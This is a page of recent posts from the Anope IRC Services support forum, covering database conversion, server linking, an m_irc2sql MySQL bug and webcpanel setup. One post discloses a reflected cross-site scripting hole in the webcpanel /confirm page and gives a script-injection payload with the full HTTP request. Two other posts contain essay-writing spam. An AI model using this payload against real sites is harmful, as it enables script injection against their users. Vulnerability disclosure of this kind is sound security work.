Anope IRC Services

Please login or register.

Login with username, password and session length
Advanced search  

News:

Pages: [1] 2 3 ... 10
 1 
 on: Yesterday at 12:43:29 PM 
Started by ambta - Last post by JeromeRobertson
Your idea sounds great!
I hope you will bring it up to life and share with us your achievement  :)

 2 
 on: July 03, 2017, 10:41:50 AM 
Started by Aragon - Last post by James Moliver
he tool worked very well for my network's conversion. 
i need to Assignment Help UK for this situation.

 3 
 on: June 30, 2017, 07:12:32 AM 
Started by Aragon - Last post by Max Reed
The converting our IRCServices database without a encryption the usage of is2an, you can't through default enable an encryption type for Anope IRC Services, which is what you did in this case. We must set the encryption kind to 'none' unless you convert your database encryption the use of some other tool that I have additionally located in this internet site. write my esay UK

 4 
 on: June 22, 2017, 06:56:47 PM 
Started by Aragon - Last post by Jahner
Going to take a long shot here and see if anyone might still have this tool. Currently using IRC Services and really want to move over to Anope. Links not working in this thread and can't find anything anywhere to convert over. Fingers crossed someone out there can humor me and help out.

 5 
 on: June 21, 2017, 12:01:29 AM 
Started by Y - Last post by wakened
I had the exact same problem with Anope-2.0.5 linking to InspIRCd 2.0.24 and the only way I could get it to link is by taking out "ssl="openssl"" from the link block on the ircd's config, it linked even though I had openssl enabled in Anope.

 6 
 on: June 05, 2017, 01:14:03 PM 
Started by Nikos - Last post by Nikos
Well,i got free time to deal with webcpanel and anope features again.I think no one would want to post vulns but i love anope so i will do it.
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before. People often think that because they see the lock on their browser it means everything is secure. So this just isn't the case.

This vulnerability affects the /confirm page which doesn't filter metacharacters from the user input.
URL encoded POST input email: url%40email.com'"()&%<ScRiPt >prompt(1)</ScRiPt>

<<<REQUEST>>> #Network is hidden
POST /confirm HTTP/1.1
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Referer: https://anope.***.org/
Host: anope.***.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

email=url%2540email.com'%22()%26%25<ScRiPt%20>prompt(1)</ScRiPt>&password=thisIs%24%24UrL&username=nikos

<<<RESPONSE>>>
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Mon, 05 Jun 2017 11:32:50 GMT
Content-Type: text/html
Content-Length: 1642
Connection: keep-alive
Strict-Transport-Security: max-age=15768000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none


Please verify.


 7 
 on: May 29, 2017, 01:03:21 PM 
Started by Kaj - Last post by Jens Voss
Hello Kaj,

thank you for reporting. I will look into it.

Kind regards
Jens

PS: we also have a bugtracker at https://bugs.anope.org :-)

 8 
 on: May 29, 2017, 12:51:40 PM 
Started by Kaj - Last post by Kaj
Hello,

I've noticed a problem when I tried to load the m_irc2sql module. After starting the services, everything works fine but the stats-tables (anope_chan and anope_user) stayed empty. If I started the application in debug mode I've notices a lot of errors like:

Quote
[May 29 09:10:35.933274 2017] m_irc2sql: Error executing query INSERT INTO `anope_chan` (channel, topic, topicauthor, topictime, modes) VALUES ('#Games','','','0','') ON DUPLICATE KEY UPDATE channel=VALUES(channel), topic=VALUES(topic),topicauthor=VALUES(topicauthor), topictime=VALUES(topictime), modes=VALUES(modes): Incorrect datetime value: '0' for column 'topictime' at row 1

After some research I've concluded that this was due to changes since mysql version 5.7 - where sqlmode STRICT_TRANS_TABLES was introduced and enabled by default:

Quote
From MySQL 5.7.4 through 5.7.7, STRICT_TRANS_TABLES includes the effect of the ERROR_FOR_DIVISION_BY_ZERO, NO_ZERO_DATE, and NO_ZERO_IN_DATE modes

After disabling this mode, the module works fine - so I am happy but I thought it would be nice to report it. Because it would even be better that this would ever get fixed in Anope itself rather than disabling this mode in mysql.

Kind regards,

Kaj



 9 
 on: May 26, 2017, 10:36:22 PM 
Started by mark - Last post by Adam
Load m_httpd and also m_webcpanel. You can use apache as a reverse proxy to it if you want, but the webserver which serves the webpanel is internal to Anope.

 10 
 on: May 26, 2017, 10:14:18 PM 
Started by mark - Last post by mark hunt
ive figured out so far, that I should somehow point my apache to read from the folder with the default web templates? or should I put that folder somewhere else? please help . iam using centos 7 with apache web server. thanks!

Pages: [1] 2 3 ... 10